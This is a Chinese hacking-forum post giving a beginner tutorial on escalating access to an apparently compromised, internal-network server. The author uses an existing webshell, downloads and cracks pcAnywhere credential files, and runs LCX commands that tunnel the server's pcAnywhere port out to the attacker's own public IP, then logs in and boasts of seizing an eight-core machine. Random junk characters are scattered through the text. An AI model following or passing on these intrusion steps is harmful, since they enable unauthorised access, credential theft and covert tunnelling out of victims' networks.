|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
+ u0 p$ K1 h F0 M6 D( ^2 u2 d% x
p3 F% ?( X: c; ~提权方法:pcanywhere+LCX: b% ^: p* ?& m0 W1 A
- [! y! v( n7 D' a U6 e/ k7 n
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
( y1 K* |6 l5 y& o6 t5 b8 _
6 ]( w4 o/ H9 O) b5 J在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。 C, S8 t3 `8 k. h# a- N
/ i! l1 B" e8 t0 q
: S% m2 _5 C* t9 S s* j
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。' \2 M: c% X" S& g
3 G9 h/ `) B# X/ `, |, c
) j0 p6 W$ `& l& S呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
3 h: ^# _) A+ l( W* [4 d6 P, \. h: d5 o/ L% E/ z
# y, D7 f t; }0 C. _
/ L' C* \. g" B3 d' B4 @5 O/ H _; x4 R/ a# J s( H
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``6 ?# |! I7 e# I$ f% |& T1 F* Q* Q
0 e7 x! k% Q& V& t* Z y% k! ]* [% [/ M* S" a
LCX的用法再简单说下:
6 M/ a5 C: b' z2 H+ ?* t6 B# T" h+ K
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
4 [/ L! z$ `7 V* E& ]3 v8 k( ?
0 x' v0 {0 p3 n7 I3 [本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
) m. G7 ?. f4 [! |0 ^7 Z; B4 l+ ^1 a5 Q; ~+ b
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
; ] c: F# n8 ]+ R& T- d顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``0 I* O/ `9 {' t8 ?0 I* m
% M" a5 G6 [" @- C/ y: c
( X; O# P& s9 M# x/ G2 z$ Q) d
3 R% i- W% | A+ m( z5 \% ?# n$ A+ }6 [' Z% _6 g" E
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。) v2 p( j% Q) \% r, Q/ I. W: _3 ?
! X' e2 k$ c3 v9 j Z
: L) l7 v9 }# z
1 Q7 z/ B9 E4 [4 Z7 E6 f. m% j- P5 ~( t: v3 o. b! H- g& j
我们本地连接试试,输入我们刚破解的账号密码$ E7 x3 d& f4 f- ?5 F
; F- A/ L3 D6 V) B' B* c
6 q' F* h v, p: P! S7 D呵呵``连接成功,服务器不错,又一个8核^︵^
r9 L. y1 W# h7 L( ?5 M3 Y% d( Y' R) b. c) y- J
5 T7 s0 `: j( t. G: G* T0 X, N6 z" \( |, r0 X& X0 b# x
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
